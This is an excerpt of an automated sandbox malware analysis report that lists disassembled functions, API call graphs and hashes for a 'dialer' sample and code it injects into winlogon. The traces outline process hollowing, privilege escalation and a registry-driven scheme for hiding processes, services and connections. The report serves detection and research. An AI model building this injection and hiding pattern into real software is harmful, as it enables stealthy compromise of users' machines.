                                                          • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                          • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                          • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                          • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                          • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                          • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                          • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                          • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                          • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                          • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                          • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                          • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                          • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                        • ExitProcess.KERNEL32 ref: 0000000140002263
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                        • String ID:
                                                        • API String ID: 3836936051-0
                                                        • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                        • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                        • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                        • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                        Non-executed Functions

                                                        Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 184 140002560-14000258c 185 140002592 184->185 186 14000273a-140002742 184->186 187 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 185->187 188 140002598-14000259f 185->188 189 140002748-14000274b 186->189 190 14000297e-1400029a2 ReadFile 186->190 191 140002a74-140002a8e 187->191 193 140002704-140002715 187->193 194 1400025a5-1400025a8 188->194 195 1400026bd-1400026bf ExitProcess 188->195 196 140002751-140002756 189->196 197 140002974-140002979 call 14000175c 189->197 190->191 192 1400029a8-1400029af 190->192 192->191 201 1400029b5-1400029c9 call 1400018ac 192->201 193->191 202 14000271b-140002733 call 1400010c0 193->202 203 1400025ae-1400025b1 194->203 204 140002660-14000268b RegOpenKeyExW 194->204 198 140002919-14000292c call 140001944 196->198 199 14000275c-14000275f 196->199 197->191 198->191 226 140002932-140002941 call 140001944 198->226 205 140002761-140002766 199->205 206 14000279d-1400027ae call 140001944 199->206 201->191 224 1400029cf-1400029d5 201->224 227 140002735 202->227 213 140002651-14000265b 203->213 214 1400025b7-1400025ba 203->214 211 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 204->211 212 14000268d-14000269b RegDeleteValueW 204->212 205->191 215 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 205->215 206->191 235 1400027b4-1400027d6 ReadFile 206->235 211->191 212->211 213->191 221 140002644-14000264c 214->221 222 1400025c0-1400025c5 214->222 221->191 222->191 229 1400025cb-1400025ef ReadFile 222->229 233 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 224->233 234 140002a5f 224->234 226->191 250 140002947-14000296f ShellExecuteW 226->250 227->191 229->191 231 1400025f5-1400025fc 229->231 231->191 238 140002602-140002616 call 1400018ac 231->238 253 140002a18-140002a1e 233->253 254 140002a49-140002a4f GetProcessHeap 233->254 240 140002a66-140002a6f call 140002a90 234->240 235->191 242 1400027dc-1400027e3 235->242 238->191 259 14000261c-140002622 238->259 240->191 242->191 249 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 242->249 255 14000290b-140002914 GetProcessHeap 249->255 256 14000282d-140002839 249->256 250->191 253->254 260 140002a20-140002a32 253->260 257 140002a52-140002a5d HeapFree 254->257 255->257 256->255 261 14000283f-14000284b 256->261 257->191 263 140002624-140002633 call 1400010c0 259->263 264 140002638-14000263f 259->264 265 140002a34-140002a36 260->265 266 140002a38-140002a40 260->266 261->255 267 140002851-14000285c 261->267 263->191 264->240 265->266 271 140002a44 call 1400016cc 265->271 266->254 272 140002a42 266->272 268 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 267->268 269 14000285e-140002869 267->269 268->255 269->255 273 14000286f-14000287c call 140001c88 269->273 271->254 272->260 273->255
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                        • String ID: SOFTWARE$dialerstager$open
                                                        • API String ID: 3276259517-3931493855
                                                        • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                        • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                        • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                        • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                        Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 280 140001c88-140001cb8 281 140001cbb-140001cc8 280->281 282 140001e8c-140001e91 281->282 283 140001cce-140001d25 CreateProcessW 281->283 282->281 286 140001e97 282->286 284 140001e88 283->284 285 140001d2b-140001d5a VirtualAllocEx 283->285 284->282 287 140001e5d-140001e60 285->287 288 140001d60-140001d7b WriteProcessMemory 285->288 289 140001e99-140001eb9 286->289 290 140001e62-140001e76 OpenProcess 287->290 291 140001e85 287->291 288->287 292 140001d81-140001d87 288->292 290->284 293 140001e78-140001e83 TerminateProcess 290->293 291->284 294 140001dd2-140001def VirtualAlloc 292->294 295 140001d89 292->295 293->284 294->287 296 140001df1-140001e07 GetThreadContext 294->296 297 140001d8c-140001dba WriteProcessMemory 295->297 296->287 299 140001e09-140001e2e WriteProcessMemory 296->299 297->287 298 140001dc0-140001dcc 297->298 298->297 300 140001dce 298->300 299->287 301 140001e30-140001e4c SetThreadContext 299->301 300->294 301->287 302 140001e4e-140001e5b ResumeThread 301->302 302->287 303 140001eba-140001ebf 302->303 303->289
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                        • String ID: @
                                                        • API String ID: 3462610200-2766056989
                                                        • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                        • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                        • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                        • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                        Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                        • String ID: dialersvc64
                                                        • API String ID: 4184240511-3881820561
                                                        • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                        • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                        • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                        • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                        Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Delete$CloseEnumOpen
                                                        • String ID: SOFTWARE\dialerconfig
                                                        • API String ID: 3013565938-461861421
                                                        • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                        • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                        • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                        • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                        Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: File$Write$CloseCreateHandle
                                                        • String ID: \\.\pipe\dialercontrol_redirect64
                                                        • API String ID: 148219782-3440882674
                                                        • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                        • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                        • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                        • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                        Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: ntdll.dll
                                                        • API String ID: 1646373207-2227199552
                                                        • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                        • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                        • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                        • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                        Execution Graph

                                                        Execution Coverage:1.3%
                                                        Dynamic/Decrypted Code Coverage:94.1%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:101
                                                        Total number of Limit Nodes:16
                                                        execution_graph 22020 1f385b9273c 22021 1f385b9276a 22020->22021 22022 1f385b927c5 VirtualAlloc 22021->22022 22025 1f385b928d4 22021->22025 22023 1f385b927ec 22022->22023 22022->22025 22024 1f385b92858 LoadLibraryA 22023->22024 22023->22025 22024->22023 22026 1f385bc5cf0 22027 1f385bc5cfd 22026->22027 22028 1f385bc5d09 22027->22028 22031 1f385bc5e1a 22027->22031 22029 1f385bc5d3e 22028->22029 22030 1f385bc5d8d 22028->22030 22032 1f385bc5d66 SetThreadContext 22029->22032 22033 1f385bc5e41 VirtualProtect FlushInstructionCache 22031->22033 22035 1f385bc5efe 22031->22035 22032->22030 22033->22031 22034 1f385bc5f1e 22044 1f385bc4df0 GetCurrentProcess 22034->22044 22035->22034 22048 1f385bc43e0 VirtualFree 22035->22048 22038 1f385bc5f23 22039 1f385bc5f77 22038->22039 22040 1f385bc5f37 ResumeThread 22038->22040 22049 1f385bc7940 IsProcessorFeaturePresent RtlLookupFunctionEntry capture_previous_context 22039->22049 22041 1f385bc5f6b 22040->22041 22041->22038 22043 1f385bc5fbf 22045 1f385bc4e0c 22044->22045 22046 1f385bc4e22 VirtualProtect FlushInstructionCache 22045->22046 22047 1f385bc4e53 22045->22047 22046->22045 22047->22038 22048->22034 22049->22043 22050 1f385bc1abc 22055 1f385bc1628 GetProcessHeap HeapAlloc 22050->22055 22052 1f385bc1ad2 Sleep SleepEx 22053 1f385bc1acb 22052->22053 22053->22052 22054 1f385bc1598 StrCmpIW StrCmpW 22053->22054 22054->22053 22099 1f385bc1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22055->22099 22057 1f385bc1650 22100 1f385bc1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22057->22100 22059 1f385bc1661 22101 1f385bc1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22059->22101 22061 1f385bc166a 22102 1f385bc1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22061->22102 22063 1f385bc1673 22064 1f385bc168e RegOpenKeyExW 22063->22064 22065 1f385bc16c0 RegOpenKeyExW 22064->22065 22066 1f385bc18a6 22064->22066 22067 1f385bc16ff RegOpenKeyExW 22065->22067 22068 1f385bc16e9 22065->22068 22066->22053 22070 1f385bc173a RegOpenKeyExW 22067->22070 22071 1f385bc1723 22067->22071 22109 1f385bc12bc 16 API calls 22068->22109 22072 1f385bc175e 22070->22072 22073 1f385bc1775 RegOpenKeyExW 22070->22073 22103 1f385bc104c RegQueryInfoKeyW 22071->22103 22110 1f385bc12bc 16 API calls 22072->22110 22078 1f385bc17b0 RegOpenKeyExW 22073->22078 22079 1f385bc1799 22073->22079 22074 1f385bc16f5 RegCloseKey 22074->22067 22082 1f385bc17eb RegOpenKeyExW 22078->22082 22083 1f385bc17d4 22078->22083 22111 1f385bc12bc 16 API calls 22079->22111 22080 1f385bc176b RegCloseKey 22080->22073 22086 1f385bc180f 22082->22086 22087 1f385bc1826 RegOpenKeyExW 22082->22087 22112 1f385bc12bc 16 API calls 22083->22112 22084 1f385bc17a6 RegCloseKey 22084->22078 22091 1f385bc104c 6 API calls 22086->22091 22088 1f385bc1861 RegOpenKeyExW 22087->22088 22089 1f385bc184a 22087->22089 22094 1f385bc189c RegCloseKey 22088->22094 22095 1f385bc1885 22088->22095 22093 1f385bc104c 6 API calls 22089->22093 22090 1f385bc17e1 RegCloseKey 22090->22082 22092 1f385bc181c RegCloseKey 22091->22092 22092->22087 22096 1f385bc1857 RegCloseKey 22093->22096 22094->22066 22097 1f385bc104c 6 API calls 22095->22097 22096->22088 22098 1f385bc1892 RegCloseKey 22097->22098 22098->22094 22099->22057 22100->22059 22101->22061 22102->22063 22104 1f385bc10bf 22103->22104 22105 1f385bc11b5 RegCloseKey 22103->22105 22104->22105 22106 1f385bc10cf RegEnumValueW 22104->22106 22105->22070 22107 1f385bc1125 22106->22107 22107->22105 22107->22106 22108 1f385bc114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 22107->22108 22108->22107 22109->22074 22110->22080 22111->22084 22112->22090 22113 1f385bc554d 22114 1f385bc5554 22113->22114 22115 1f385bc55bb 22114->22115 22116 1f385bc5637 VirtualProtect 22114->22116 22117 1f385bc5671 22116->22117 22118 1f385bc5663 GetLastError 22116->22118 22118->22117 22119 1f385bf273c 22120 1f385bf276a 22119->22120 22121 1f385bf27c5 VirtualAlloc 22120->22121 22122 1f385bf27ec 22120->22122 22121->22122 22123 1f385bc28c8 22125 1f385bc290e 22123->22125 22124 1f385bc2970 22125->22124 22127 1f385bc3844 22125->22127 22128 1f385bc3851 StrCmpNIW 22127->22128 22129 1f385bc3866 22127->22129 22128->22129 22129->22125 22130 1f385bc3ab9 22131 1f385bc3a06 22130->22131 22132 1f385bc3a56 VirtualQuery 22131->22132 22133 1f385bc3a70 22131->22133 22134 1f385bc3a8a VirtualAlloc 22131->22134 22132->22131 22132->22133 22134->22133 22135 1f385bc3abb GetLastError 22134->22135 22135->22131

                                                        Executed Functions

                                                        Function 000001F385BC1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 5a9fcc6cd55dee6a316c52f2010dba24f70424c837c5cf46fdf9dedb95e6d04b
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: D8712A36710A1286EB919F21E8906E92364F7E4BE8F405231FE5E57BACDE3CCA44C344
                                                        Function 000001F385BC3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: ea3d30c06083b22014454e8c8fffd79e95962deda3e2360bae8acdd5a724b91a
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 99113C36704B4282EF959F11E4046B962A0F798BE5F840239EEA9077D8EF3DCA05C708
                                                        Function 000001F385BC5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 57 1f385bc5b30-1f385bc5b57 58 1f385bc5b6b-1f385bc5b76 GetCurrentThreadId 57->58 59 1f385bc5b59-1f385bc5b68 57->59 60 1f385bc5b82-1f385bc5b89 58->60 61 1f385bc5b78-1f385bc5b7d 58->61 59->58 63 1f385bc5b9b-1f385bc5baf 60->63 64 1f385bc5b8b-1f385bc5b96 call 1f385bc5960 60->64 62 1f385bc5faf-1f385bc5fc6 call 1f385bc7940 61->62 67 1f385bc5bbe-1f385bc5bc4 63->67 64->62 70 1f385bc5bca-1f385bc5bd3 67->70 71 1f385bc5c95-1f385bc5cb6 67->71 73 1f385bc5c1a-1f385bc5c8d call 1f385bc4510 call 1f385bc44b0 call 1f385bc4470 70->73 74 1f385bc5bd5-1f385bc5c18 call 1f385bc85c0 70->74 76 1f385bc5e1f-1f385bc5e30 call 1f385bc74bf 71->76 77 1f385bc5cbc-1f385bc5cdc GetThreadContext 71->77 87 1f385bc5c90 73->87 74->87 91 1f385bc5e35-1f385bc5e3b 76->91 80 1f385bc5ce2-1f385bc5d03 77->80 81 1f385bc5e1a 77->81 80->81 90 1f385bc5d09-1f385bc5d12 80->90 81->76 87->67 95 1f385bc5d92-1f385bc5da3 90->95 96 1f385bc5d14-1f385bc5d25 90->96 92 1f385bc5e41-1f385bc5e98 VirtualProtect FlushInstructionCache 91->92 93 1f385bc5efe-1f385bc5f0e 91->93 97 1f385bc5ec9-1f385bc5ef9 call 1f385bc78ac 92->97 98 1f385bc5e9a-1f385bc5ea4 92->98 102 1f385bc5f10-1f385bc5f17 93->102 103 1f385bc5f1e-1f385bc5f2a call 1f385bc4df0 93->103 99 1f385bc5e15 95->99 100 1f385bc5da5-1f385bc5dc3 95->100 104 1f385bc5d8d 96->104 105 1f385bc5d27-1f385bc5d3c 96->105 97->91 98->97 106 1f385bc5ea6-1f385bc5ec1 call 1f385bc4390 98->106 100->99 107 1f385bc5dc5-1f385bc5e10 call 1f385bc3900 call 1f385bc74dd 100->107 102->103 109 1f385bc5f19 call 1f385bc43e0 102->109 121 1f385bc5f2f-1f385bc5f35 103->121 104->99 105->104 111 1f385bc5d3e-1f385bc5d88 call 1f385bc3970 SetThreadContext 105->111 106->97 107->99 109->103 111->104 122 1f385bc5f77-1f385bc5f95 121->122 123 1f385bc5f37-1f385bc5f75 ResumeThread call 1f385bc78ac 121->123 126 1f385bc5f97-1f385bc5fa6 122->126 127 1f385bc5fa9 122->127 123->121 126->127 127->62
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                        • Instruction ID: a353196f63e3f686d0841e7f12a7e206c81323a03f893301661436a76609e4c4
                                                        • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                        • Instruction Fuzzy Hash: 40D19A36205B4981DAB19B06E4913AA77A0F7D8BD5F140226EE9D47BE9DF3CCA41CB04
                                                        Function 000001F385BC50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 129 1f385bc50d0-1f385bc50fc 130 1f385bc510d-1f385bc5116 129->130 131 1f385bc50fe-1f385bc5106 129->131 132 1f385bc5127-1f385bc5130 130->132 133 1f385bc5118-1f385bc5120 130->133 131->130 134 1f385bc5141-1f385bc514a 132->134 135 1f385bc5132-1f385bc513a 132->135 133->132 136 1f385bc514c-1f385bc5151 134->136 137 1f385bc5156-1f385bc5161 GetCurrentThreadId 134->137 135->134 138 1f385bc56d3-1f385bc56da 136->138 139 1f385bc516d-1f385bc5174 137->139 140 1f385bc5163-1f385bc5168 137->140 141 1f385bc5181-1f385bc518a 139->141 142 1f385bc5176-1f385bc517c 139->142 140->138 143 1f385bc518c-1f385bc5191 141->143 144 1f385bc5196-1f385bc51a2 141->144 142->138 143->138 145 1f385bc51ce-1f385bc5225 call 1f385bc56e0 * 2 144->145 146 1f385bc51a4-1f385bc51c9 144->146 151 1f385bc5227-1f385bc522e 145->151 152 1f385bc523a-1f385bc5243 145->152 146->138 153 1f385bc5230 151->153 154 1f385bc5236 151->154 155 1f385bc5255-1f385bc525e 152->155 156 1f385bc5245-1f385bc5252 152->156 157 1f385bc52b0-1f385bc52b6 153->157 158 1f385bc52a6-1f385bc52aa 154->158 159 1f385bc5260-1f385bc5270 155->159 160 1f385bc5273-1f385bc5298 call 1f385bc7870 155->160 156->155 162 1f385bc52b8-1f385bc52d4 call 1f385bc4390 157->162 163 1f385bc52e5-1f385bc52eb 157->163 158->157 159->160 170 1f385bc532d-1f385bc5342 call 1f385bc3cc0 160->170 171 1f385bc529e 160->171 162->163 172 1f385bc52d6-1f385bc52de 162->172 164 1f385bc52ed-1f385bc530c call 1f385bc78ac 163->164 165 1f385bc5315-1f385bc5328 163->165 164->165 165->138 176 1f385bc5351-1f385bc535a 170->176 177 1f385bc5344-1f385bc534c 170->177 171->158 172->163 178 1f385bc536c-1f385bc53ba call 1f385bc8c60 176->178 179 1f385bc535c-1f385bc5369 176->179 177->158 182 1f385bc53c2-1f385bc53ca 178->182 179->178 183 1f385bc53d0-1f385bc54bb call 1f385bc7440 182->183 184 1f385bc54d7-1f385bc54df 182->184 195 1f385bc54bf-1f385bc54ce call 1f385bc4060 183->195 196 1f385bc54bd 183->196 186 1f385bc54e1-1f385bc54f4 call 1f385bc4590 184->186 187 1f385bc5523-1f385bc552b 184->187 201 1f385bc54f8-1f385bc5521 186->201 202 1f385bc54f6 186->202 188 1f385bc552d-1f385bc5535 187->188 189 1f385bc5537-1f385bc5546 187->189 188->189 192 1f385bc5554-1f385bc5561 188->192 193 1f385bc554f 189->193 194 1f385bc5548 189->194 198 1f385bc5563 192->198 199 1f385bc5564-1f385bc55b9 call 1f385bc85c0 